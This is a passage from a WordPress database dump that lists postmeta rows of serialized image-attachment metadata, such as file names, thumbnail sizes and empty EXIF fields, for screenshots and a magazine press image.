eg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"press-Northern-life-mag-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-600x776.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:776;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-600x776.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:776;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13313,5147,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.56.49.png'),(13314,5147,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1116;s:6:\"height\";i:1222;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.56.49.png\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-274x300.png\";s:5:\"width\";i:274;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-15.56.49-935x1024.png\";s:5:\"width\";i:935;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-768x841.png\";s:5:\"width\";i:768;s:6:\"height\";i:841;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-15.56.49-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-15.56.49-550x1100.png\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:47:\"Screenshot-2020-04-13-at-15.56.49-1100x1100.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-600x657.png\";s:5:\"width\";i:600;s:6:\"height\";i:657;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-600x657.png\";s:5:\"width\";i:600;s:6:\"height\";i:657;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.56.49-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13315,5148,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.57.33.png'),(13316,5148,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:356;s:6:\"height\";i:506;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.57.33.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-356x300.png\";s:5:\"width\";i:356;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.33-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13317,5149,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.57.54.png'),(13318,5149,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:712;s:6:\"height\";i:818;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.57.54.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-261x300.png\";s:5:\"width\";i:261;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-712x550.png\";s:5:\"width\";i:712;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-550x818.png\";s:5:\"width\";i:550;s:6:\"height\";i:818;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-600x689.png\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-600x689.png\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.57.54-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13319,5150,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.58.30.png'),(13320,5150,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1102;s:6:\"height\";i:818;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.58.30.png\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-300x223.png\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-15.58.30-1024x760.png\";s:5:\"width\";i:1024;s:6:\"height\";i:760;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-768x570.png\";s:5:\"width\";i:768;s:6:\"height\";i:570;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-15.58.30-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-550x818.png\";s:5:\"width\";i:550;s:6:\"height\";i:818;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:46:\"Screenshot-2020-04-13-at-15.58.30-1100x818.png\";s:5:\"width\";i:1100;s:6:\"height\";i:818;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-600x445.png\";s:5:\"width\";i:600;s:6:\"height\";i:445;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-600x445.png\";s:5:\"width\";i:600;s:6:\"height\";i:445;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.30-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13321,5151,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.58.57.png'),(13322,5151,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:762;s:6:\"height\";i:836;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.58.57.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-273x300.png\";s:5:\"width\";i:273;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-762x550.png\";s:5:\"width\";i:762;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-550x836.png\";s:5:\"width\";i:550;s:6:\"height\";i:836;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-600x658.png\";s:5:\"width\";i:600;s:6:\"height\";i:658;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-600x658.png\";s:5:\"width\";i:600;s:6:\"height\";i:658;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.58.57-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13323,5152,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.59.20.png'),(13324,5152,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:678;s:6:\"height\";i:676;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.59.20.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-678x550.png\";s:5:\"width\";i:678;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-550x676.png\";s:5:\"width\";i:550;s:6:\"height\";i:676;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-600x598.png\";s:5:\"width\";i:600;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-600x598.png\";s:5:\"width\";i:600;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.20-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13325,5153,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.59.33.png'),(13326,5153,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:678;s:6:\"height\";i:676;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.59.33.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-678x550.png\";s:5:\"width\";i:678;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-550x676.png\";s:5:\"width\";i:550;s:6:\"height\";i:676;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-600x598.png\";s:5:\"width\";i:600;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-600x598.png\";s:5:\"width\";i:600;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.33-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13327,5154,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-15.59.46.png'),(13328,5154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:762;s:6:\"height\";i:808;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-15.59.46.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-15.59.46-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i